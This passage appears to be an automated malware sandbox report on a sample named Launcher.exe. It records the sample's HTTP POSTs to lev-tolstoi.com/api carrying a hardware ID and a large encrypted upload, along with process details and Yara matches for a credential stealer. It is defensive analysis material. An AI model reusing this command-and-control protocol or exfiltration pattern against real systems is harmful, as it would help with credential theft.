                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=81rmahsuk5dddhc08f7n1kbnrg; expires=Thu, 17 Apr 2025 16:37:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HL7arkl17oViZCcbyEL075kK3uFHqAKPyJJFeL68CF3NsKlfcZ17mIX7eRQxeSGNAGElHhOZmmsA%2B9S3XlGsFXtEAbqlfAJp9Jt0IxujJ5nydGxcxotqLtlqbu8SEgAOC0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f63abcafb2e78e1-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1840&rtt_var=700&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2114&delivery_rate=1552365&cwnd=203&unsent_bytes=0&cid=0ffd205c59a0ed1f&ts=689&x=0"
                                                                                                                                                                                                                                                          2024-12-22 22:50:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-22 22:50:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          7192.168.2.549762104.21.66.864436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=23BO8WTDUMZGFIJD
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 568760
                                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: 2d 2d 32 33 42 4f 38 57 54 44 55 4d 5a 47 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 33 32 34 45 42 42 39 42 44 38 45 38 38 36 45 30 32 32 45 39 45 46 41 42 32 37 36 46 31 37 0d 0a 2d 2d 32 33 42 4f 38 57 54 44 55 4d 5a 47 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 33 42 4f 38 57 54 44 55 4d 5a 47 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 32 39 31 34 37 39 31 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --23BO8WTDUMZGFIJDContent-Disposition: form-data; name="hwid"65324EBB9BD8E886E022E9EFAB276F17--23BO8WTDUMZGFIJDContent-Disposition: form-data; name="pid"1--23BO8WTDUMZGFIJDContent-Disposition: form-data; name="lid"yau6Na--622914791
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: f9 98 46 79 d1 bc c3 17 24 66 5f af f5 ef 77 c0 00 95 f9 da de 82 a5 7a 05 c6 48 39 4b 69 70 24 2c a5 1c 40 00 b1 13 c4 d8 43 29 12 40 69 02 ca 6a 84 33 4f b8 32 5c 85 41 bb 2a 16 e6 e3 60 d9 b6 e8 f0 4c b1 f5 7d 1c 8f 1d e0 b1 ef bc 2d 1a 84 57 74 74 77 63 fb 4c f9 ad fe ff 07 d1 a9 07 00 ad b8 03 cc f1 81 04 53 4a 3e 0b 30 fb f8 60 7e aa d2 a5 cc 88 c8 32 cb c5 de cc 72 7e 88 fb 0f d1 f8 b1 39 83 4b 34 b2 ef b4 81 18 87 64 10 6f e1 90 9a e9 e4 c1 07 9a 15 57 03 4d d1 71 3b 9e 39 95 41 0a 6a 30 65 07 af 44 93 ea bf f5 21 3d 22 f1 13 82 5b bb 65 68 ce 1c 28 76 a4 26 f9 f9 f2 a4 1a 77 4a 2b 89 52 6d 21 4f 1e 82 e5 7a 4b 80 8d 1b 77 ba a4 14 53 74 0e 33 6f 92 b1 dd 1c e0 aa c8 6a 70 16 e5 10 d6 14 6b 7b cd 4d c7 d7 1d 95 28 24 46 16 92 e8 ac 6a ce e4 ae 00
                                                                                                                                                                                                                                                          Data Ascii: Fy$f_wzH9Kip$,@C)@ij3O2\A*`L}-WttwcLSJ>0`~2r~9K4doWMq;9Aj0eD!="[eh(v&wJ+Rm!OzKwSt3ojpk{M($Fj
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: fb cf b1 bf 72 c7 d6 8b da 4d 80 b1 3a ff 25 34 b9 77 0a 14 13 52 ee 32 c9 a2 36 13 db 31 3d 2e 8d e1 01 a7 32 22 1e 88 ea 0d d7 ba 46 f2 94 30 b0 da 26 75 da 52 4d c4 51 95 ff 6d 52 8d d5 17 cb 67 21 b4 6d 68 5e 6c 6a cd cd 17 9a fe 7d 24 50 1d 09 aa 8c 1a 5d 3f e2 32 e8 6a 6c 26 92 9b ca 08 bf 34 4f 5e 72 b1 80 83 4e 93 f1 3e 89 8b d6 2a d5 89 3b 19 a1 44 d3 67 16 71 47 d0 04 14 3b ad 78 e5 ab c2 7a 9d a4 bb 0a c3 70 52 a9 31 78 1a d5 58 5e 81 78 de e4 7c 13 2f 81 3d 6a c5 89 35 fa 3b 08 2c da 67 33 82 17 5f 7e 39 56 fa db bd b0 ce f2 ec 15 1e 2d f3 cf 9c 6c 86 06 1f 46 92 73 26 81 b7 27 ad bd 5d 11 a1 73 7e 0b fd fd 61 33 73 67 63 b3 e6 df 6b 21 e1 dd b4 5c f7 72 32 8a d0 f6 b4 f6 fb 66 ab 2c f2 3f 75 de 22 58 84 7e db 68 fe 53 14 55 ff c7 c5 8e 0e 95
                                                                                                                                                                                                                                                          Data Ascii: rM:%4wR261=.2"F0&uRMQmRg!mh^lj}$P]?2jl&4O^rN>*;DgqG;xzpR1xX^x|/=j5;,g3_~9V-lFs&']s~a3sgck!\r2f,?u"X~hSU
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: 21 58 71 30 2c b6 57 a4 40 7b 44 1a 4c dc 35 0d cf 4e 4d 79 89 9d 19 1c 2f 1d d4 97 8f 09 77 b4 39 54 a1 77 0d 53 0e b4 6b da 0f 47 4a ac 3b 4d 79 31 b4 60 85 ea 4d c6 28 8a e7 26 7a 84 2c 09 96 9d d4 51 0d ba 5e 40 e8 82 88 5b 74 dd d2 53 95 d4 ef 6e 43 2c 9b a9 fc c5 94 bf f5 19 52 6d ba 6f e4 c1 e0 a5 91 42 f2 f9 65 c1 62 43 c6 f0 b7 b2 83 84 da f6 3b df 87 91 0e f9 2b a0 3e ec aa c7 af 21 85 4f c3 99 d5 40 3b 5c 3d 7b 17 9a d6 6a 5d 32 cf d9 74 fa 28 49 03 38 b6 ab a4 c4 63 d2 e3 51 b9 a3 f8 c6 6f 75 35 ef 1d 39 4e 8f 3a 8f 35 95 3e 10 2a 0c 19 f1 cd 94 b8 12 4b b5 a5 c3 6f 5d 1a 2f 57 20 fb 1c 35 1d d5 49 75 ef f8 46 a1 5d 15 f6 48 fe 32 ef d5 d1 b2 c9 f8 41 72 b3 8d 1a e5 54 3b bd c1 a4 1f 12 f1 a1 68 b1 8d 87 36 16 04 18 a3 ef 19 3c 6b be 81 ce 5b
                                                                                                                                                                                                                                                          Data Ascii: !Xq0,W@{DL5NMy/w9TwSkGJ;My1`M(&z,Q^@[tSnC,RmoBebC;+>!O@;\={j]2t(I8cQou59N:5>*Ko]/W 5IuF]H2ArT;h6<k[
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: 3b 57 aa 55 d2 b6 89 d2 4f 40 6b a9 d4 dd 60 2b 45 61 d3 a3 64 50 93 61 bf e2 e5 c9 7c db 77 86 49 c6 e3 ed 38 d1 a9 78 d5 a8 1d 7d e2 83 da eb ed 32 44 7b ae c9 51 0a fb b8 ad 27 b5 af 25 70 92 e6 f3 e5 18 de 77 65 57 97 0a 08 3a a2 9c d6 f1 a4 c1 ac 1c e5 a3 8c 86 b0 0a e4 41 58 e1 0a 80 96 b0 87 58 a2 e0 07 6f db 0f e1 16 62 b0 1b 76 5d 9a 83 ac b1 10 41 8f 44 06 41 d7 dd 55 1a f9 20 0b 60 af 42 39 f4 fb 6d 29 cb 71 ca c3 b3 8a 0f 66 51 ca 2e c3 ec 3c 68 65 af 10 73 97 27 30 c5 5e 1b c1 32 e7 fa ef ee de eb d9 99 2b 5e 79 75 37 26 dd ad 8e 39 9e 23 3a e5 9c 10 2f 16 ec 80 97 91 ed fb 96 04 1f df 8c dd d1 2c b9 e8 a4 47 90 c0 5c 88 75 ec 5b 65 04 fa eb 74 cd db 54 58 39 64 77 82 66 c5 d1 ef 3f 84 13 74 20 5d 53 97 7f 81 f6 06 6a e3 4e cf f8 b7 26 5b 41
                                                                                                                                                                                                                                                          Data Ascii: ;WUO@k`+EadPa|wI8x}2D{Q'%pweW:AXXobv]ADAU `B9m)qfQ.<hes'0^2+^yu7&9#:/,G\u[etTX9dwf?t ]SjN&[A
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: 1b cf dd 52 c5 b0 4c f8 ec be d5 32 3a 82 70 85 92 58 04 02 70 f9 21 00 fa 37 c2 dd c3 ae a3 fc 7b 27 98 cd 13 95 65 4f 13 50 e8 d7 1b 4f 11 9f c1 01 9e 11 a0 c9 60 96 c1 ec a1 b9 c7 0e 91 61 36 10 ed 79 79 02 4b f4 27 dc 04 8b 11 8f f6 1e 05 2c 77 9b d0 11 41 10 a8 b7 7e 5f c6 53 be 58 87 00 09 c0 bb 60 0b 84 f5 62 88 b9 23 c5 d2 c2 ad f4 9c 07 e1 4f d7 fd c2 06 05 7d 0f 2f db ce 57 f6 ec 72 93 f8 9b f5 c4 eb ec 58 2b ba d5 0c 7f ff bd 65 1f f0 8e e2 9f c8 51 2b 74 12 01 6e 4a 76 83 60 83 1c 15 20 27 ce 3e ab c8 f8 22 fe 05 f2 8e d2 28 28 93 82 a6 3b 97 64 63 19 3d 25 38 d9 dc 33 88 e1 31 51 6a df fe ee 9d 60 72 44 09 c7 38 2d 21 f1 a7 34 f9 9d 28 f5 04 91 b8 fc 53 aa 5b 04 08 4b 47 df fa 0a c9 5d 2f 70 23 a0 0d fe ce a8 a3 a8 9d 58 d4 48 04 1c 0c 5f 0a
                                                                                                                                                                                                                                                          Data Ascii: RL2:pXp!7{'eOPO`a6yyK',wA~_SX`b#O}/WrX+eQ+tnJv` '>"((;dc=%831Qj`rD8-!4(S[KG]/p#XH_
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: bc 9c b2 7f 7d f8 0b f6 67 f1 d2 95 e7 82 0c 36 e7 7d 4e f9 35 aa 88 80 f0 7e e6 da 4b 42 74 cf d9 44 29 d7 b9 b7 4e fb da c3 8b 77 5a d3 57 6f b6 1d c2 5c 76 44 ba b8 cb 89 98 17 2b af 4b f0 71 8c da 5b 78 db 54 b3 ce e7 67 1b 5f ac 2c 5d 2b ae ba ef a2 13 59 75 75 5f d5 6a b7 e3 f7 dd 24 16 cd 69 1c 16 bc 0f d5 3c 09 78 ad f3 fc ad 0f ab 87 ca 74 94 2a b5 fb d2 42 f9 71 77 8b 2c 45 f5 3f a4 cf 83 fe fd ee 96 cc b0 9f af ac 23 57 9d 9e 77 0e e7 48 44 ae be b8 ed 25 08 13 5a 77 66 4e 9e fe e2 60 da ff bd 74 34 d5 5e f2 93 d9 f7 83 19 d9 c3 71 cc d9 2b 91 a6 8c 18 d9 8d af 42 2d c7 17 a2 1b 8a d6 1a de ae 37 ac df 9b 38 e1 f4 4e 38 e4 a9 0d cc b7 dc 1d 83 8a 52 d5 90 ac 66 e2 36 ae c6 15 e2 25 9e 81 94 50 47 68 61 4f c1 b5 8d 53 7e a3 4f aa 72 7c 83 fd 1c
                                                                                                                                                                                                                                                          Data Ascii: }g6}N5~KBtD)NwZWo\vD+Kq[xTg_,]+Yuu_j$i<xt*Bqw,E?#WwHD%ZwfN`t4^q+B-78N8Rf6%PGhaOS~Or|
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: e5 49 f8 60 13 46 03 3a f5 c6 5d 00 76 f5 12 ae a0 11 41 1e 96 5b 68 ae 09 a3 2b bc d4 70 74 8d a9 3a e8 e8 d9 a8 2e f8 ec b3 3c e1 08 47 0c 7d 3e 5b a4 f1 0e 1c 2b 6b b2 36 5a dd a1 2a 4f c6 76 f0 43 4e 1c 68 6a 2c dd c5 19 58 b5 59 4e 17 06 12 43 b0 df 0e 4a 7b 71 7e 61 d3 13 70 c9 db b0 b5 01 a6 e6 51 5c 11 dd a6 80 26 cb 4a 10 c4 96 a7 f5 05 f3 9d 9b ca 8d c5 d7 22 e6 e7 78 cc 19 11 c9 5b 38 60 26 66 96 d9 5d 43 15 7f 54 77 6e ce c3 b3 01 6b 8a 1b 57 84 f2 34 d0 e3 31 29 7c b3 15 47 14 e5 2f b8 44 6c 9c 53 26 0a fc 18 38 8d 6d ab b7 f6 82 1d b9 7b 23 c9 da 26 5f 7e 5c 51 d0 58 7c ee 09 25 df 22 4c 02 0c 5a 69 7d 70 0c 54 e3 6b 0f c3 58 0d 3b 28 90 83 99 03 fd 65 b1 c6 29 dc 73 cc 8c ab ec bb a6 84 14 4c 50 0c 9d 09 08 ef c9 5e f8 74 53 b5 8e 50 78 79
                                                                                                                                                                                                                                                          Data Ascii: I`F:]vA[h+pt:.<G}>[+k6Z*OvCNhj,XYNCJ{q~apQ\&J"x[8`&f]CTwnkW41)|G/DlS&8m{#&_~\QX|%"LZi}pTkX;(e)sLP^tSPxy
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: 88 c7 3c c6 b9 ef 01 d8 85 06 71 20 34 1b 31 9e f8 37 94 c7 f3 81 8f 29 1d e1 58 d3 a5 5c c8 35 86 5a 25 4a dd 25 58 54 c7 c3 b8 e5 93 4d f8 18 be 7c 1c d5 7d 7d fa ae e9 70 62 10 92 a7 d1 9c 75 f3 9a 4c 4b 54 61 42 10 e2 24 63 cc 93 59 74 36 a1 2d 80 b4 f1 2b 2f ad 4b 73 17 a1 f1 b7 65 e9 a7 a1 a8 45 b5 d7 1c 31 ce be a5 38 b9 f4 79 1a 22 3e 6b c4 32 cf cb 23 6f d4 bc 06 85 c3 2d 78 f6 2a 35 e6 75 70 bb 25 89 04 42 08 07 82 9d 97 24 66 a2 32 df 32 7b a0 a2 17 0d ea 88 53 fd 19 a7 05 16 f6 89 ab 8b c7 fc 44 e2 06 65 e5 87 a2 56 fb 0f 78 be c3 9a 2a 10 95 5c 23 e3 23 df f1 0d 57 80 f4 25 db 34 49 a1 96 a2 97 ed 5b 3c 80 1d cc 37 e8 14 9b 0c 6f 6d 12 a5 92 67 d6 ce 80 b6 43 d8 5a 2e c9 f8 d5 d8 88 c7 e2 5a f4 62 2a 48 3f 89 a7 19 a3 97 6c 04 4d 0f f3 1d df
                                                                                                                                                                                                                                                          Data Ascii: <q 417)X\5Z%J%XTM|}}pbuLKTaB$cYt6-+/KseE18y">k2#o-x*5up%B$f22{SDeVx*\##W%4I[<7omgCZ.Zb*H?lM
                                                                                                                                                                                                                                                          2024-12-22 22:50:31 UTC15331OUTData Raw: 6f 2b c7 ba 73 5a 04 ff 0b 48 8a 8f 42 0e 85 fd 3c 64 3c ff d3 5f 33 16 be 77 98 c0 30 00 74 3f 55 86 13 92 2c 04 79 19 7e de ee 12 13 7e a2 c6 9b 71 0d 03 4b ff 0d ae 3e 89 41 63 eb ee 77 31 1c f5 82 85 80 cb be 58 2d d4 5b 42 69 57 bc 24 d1 08 b1 65 73 e6 75 ee e5 9c 56 48 13 49 7d a5 18 ad e1 43 58 d6 e0 6f 36 20 2d 68 ae 8e 50 24 30 34 40 6c ef 2c a9 1a 32 14 c3 77 6f ff 77 df fa 72 d3 ca ec 36 9e 1a 18 35 a1 3f 34 58 c1 b1 b7 d3 e9 27 01 71 7f ec c2 95 61 fc c6 12 df 5a 05 03 7e 4a 8a 25 78 03 04 ea df 3d 67 40 e7 2e fc fe f0 9f 72 b2 8f eb 56 35 c9 08 b2 11 b2 7c 14 f9 bb 9f 24 1d eb 44 2c 00 c4 dd c2 23 ee a2 4b 78 9e 92 e1 32 17 b7 e1 6f a5 e9 a4 10 73 02 92 6d b8 18 1a fa 44 f8 3f 32 8a b5 37 e6 b2 84 55 ea b0 9d 89 7a 6c 84 11 d6 81 9f b0 fd cc
                                                                                                                                                                                                                                                          Data Ascii: o+sZHB<d<_3w0t?U,y~~qK>Acw1X-[BiW$esuVHI}CXo6 -hP$04@l,2wowr65?4X'qaZ~J%x=g@.rV5|$D,#Kx2osmD?27Uzl
                                                                                                                                                                                                                                                          2024-12-22 22:50:38 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:38 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=heda104sbt4rsq2vlnphuou2es; expires=Thu, 17 Apr 2025 16:37:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X7okCs5RyfrrVyHNWmoldEQG1K2o%2BgLWggkuw4QgxZKuPeALmGCC%2Flik%2Bp63LGNhUGMndhd5i9i%2B5%2BRupFHF9KuPqy0aPHcL3UmliGcblCC8CkBwVpQWPKPZzhLzzsjn%2F1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f63abd9e8af0fa5-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1497&rtt_var=585&sent=328&recv=596&lost=0&retrans=0&sent_bytes=2836&recv_bytes=571304&delivery_rate=1950567&cwnd=190&unsent_bytes=0&cid=4f1422738b60b749&ts=7487&x=0"


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          8192.168.2.549783104.21.66.864436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:39 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 86
                                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:39 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 32 32 39 31 34 37 39 31 26 6a 3d 26 68 77 69 64 3d 36 35 33 32 34 45 42 42 39 42 44 38 45 38 38 36 45 30 32 32 45 39 45 46 41 42 32 37 36 46 31 37
                                                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=yau6Na--622914791&j=&hwid=65324EBB9BD8E886E022E9EFAB276F17
                                                                                                                                                                                                                                                          2024-12-22 22:50:40 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:40 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=sr3s4k4mdehk7c5kd1ff3dipsv; expires=Thu, 17 Apr 2025 16:37:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7DlIQYoXbhaeBQvFRHyY3Kxa0vbaBGMUvxyxydItgQL6GkmGwVOT6jAXGLjRSz987Oav%2BiGomu4yrNfLKY8ynAGifLdQGQWLGcUHsBgmny2Bm18gPEiE0C79Sh7JtzH2QE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f63ac10ee9143b5-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1609&rtt_var=619&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=985&delivery_rate=1814791&cwnd=225&unsent_bytes=0&cid=458cc0685db3ba04&ts=796&x=0"
                                                                                                                                                                                                                                                          2024-12-22 22:50:40 UTC54INData Raw: 33 30 0d 0a 6b 34 6e 6e 56 2f 4e 73 37 67 46 61 72 55 4a 73 73 61 57 6b 34 34 35 55 68 76 32 46 63 59 6b 4b 75 57 50 30 7a 4d 6a 48 64 4b 44 49 31 41 3d 3d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 30k4nnV/Ns7gFarUJssaWk445Uhv2FcYkKuWP0zMjHdKDI1A==
                                                                                                                                                                                                                                                          2024-12-22 22:50:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                          Start time:17:49:56
                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Launcher.exe"
                                                                                                                                                                                                                                                          Imagebase:0x9c0000
                                                                                                                                                                                                                                                          File size:552'960 bytes
                                                                                                                                                                                                                                                          MD5 hash:B7C46F4D20C5A3926DF76E882D2BABE7
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                          Start time:17:49:56
                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                          Start time:17:49:57
                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Launcher.exe"
                                                                                                                                                                                                                                                          Imagebase:0x9c0000
                                                                                                                                                                                                                                                          File size:552'960 bytes
                                                                                                                                                                                                                                                          MD5 hash:B7C46F4D20C5A3926DF76E882D2BABE7
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2349716206.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2348231788.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2346332053.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2348803317.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2343011519.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2349091115.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2346946917.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2183979276.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2343830924.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2345580376.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
